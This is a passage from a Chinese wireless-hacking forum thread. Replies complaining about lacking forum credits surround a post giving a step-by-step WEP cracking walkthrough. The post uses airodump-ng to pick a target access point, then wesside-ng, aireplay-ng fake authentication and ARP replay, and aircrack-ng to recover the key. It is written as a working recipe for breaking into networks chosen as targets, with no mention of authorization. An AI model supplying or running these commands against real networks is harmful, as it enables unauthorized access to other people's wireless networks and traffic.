新人啊,没钱
顶了 ~~ 赚钱先
晕哦 还少两块钱。。。好穷
额 还少一块。。。呵呵
新人啊,没钱买啊!!!!!!!!!!!!!!!!!!!!!!!!!!!!
顶一下...............................................................
再顶。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
READ???????????????????????????
终于入手 Alfa AWUS036h,小庆一下,win下挂了一夜的bt/pass,bt4/pass没发现什么大问题。
题外话了,好多如我一样的新手,进入bt4后就感觉无从下手了,因为bt3有个spoonwep!
用习惯后很难用命令,感觉太长,难记,易输错 !
其实不然,现在用aircrack组件命令也很简单,必尽一直在更新.
环境:
ap mac 00:11:22:aa:bb:cc
wep/open加密,无线网卡 Alfa AWUS036h
1. 无线网卡置monitor
这个到那多一样,如不会,先google!
2. airodump-ng wlan0
wlan0是我的无线网卡名称,用你自已的网卡接口名称代替
如airodump-ng rausb0
airodump-ng ath0
airodump-ng mon0 ........
这个命令是找个下手的目标,如你已有目标ap可跳过进入下一步!
如何知道那个ap适合?
我的经验是:
1> 看PWR 不能低于网卡底限!
具体数值也要根据网卡而定的,试验多了,你就会心中有数.
2>信号达到要求后就是看 #Data 等N分钟一直为0就放弃吧,别在这种ap上浪费时间,
有人会说无客户端也能破啊,无客户端是能破,但这种极品ap真是少之有少,如不信你可以慢慢试.....
确定目标后进入下一步
3. wesside-ng -v 00:11:22:aa:bb:cc -i wlan0
-v 00:11:22:aa:bb:cc
指定ap地址
-i wlan0
指定网卡接口名称我这里是wlan0,用你自己的网卡接口名称代替
等上4-5分钟,得到key!
wesside-ng 在满足条件的情况下来说,是最快的一个命令了!
如报错,可加-k 1参数!
wesside-ng -k 1 -v 00:11:22:aa:bb:cc -i wlan0
在报错,征明你的网卡确实不支持,下一步。
4. airodump-ng -c 6 --bssid 00:11:22:aa:bb:cc -w temp wlan0
-c 6 ap在6频道
--bssid 00:11:22:aa:bb:cc 指定ap地址
-w temp捕获包的名称 我这叫temp
5. aireplay-ng -1 0 -a 00:11:22:aa:bb:cc wlan0
-a 00:11:22:aa:bb:cc 指定ap地址
做假冒认证,成功后:-)
6. aireplay-ng -3 -b 00:11:22:aa:bb:cc wlan0
-b 00:11:22:aa:bb:cc指定ap地址
arp重播,成功后下一步
7. aircrack-ng temp*.cap
最终章,得到key!
说了半天,高手见笑,有错误望指出,大家共同进步。
谢谢楼主了,新手还没钱下
新人啊,没钱买啊?555555本文地址:http://forum.anywlan.com/thread-37583-1-1.html
可惜要花钱买啊本文地址:http://forum.anywlan.com/thread-37583-1-1.html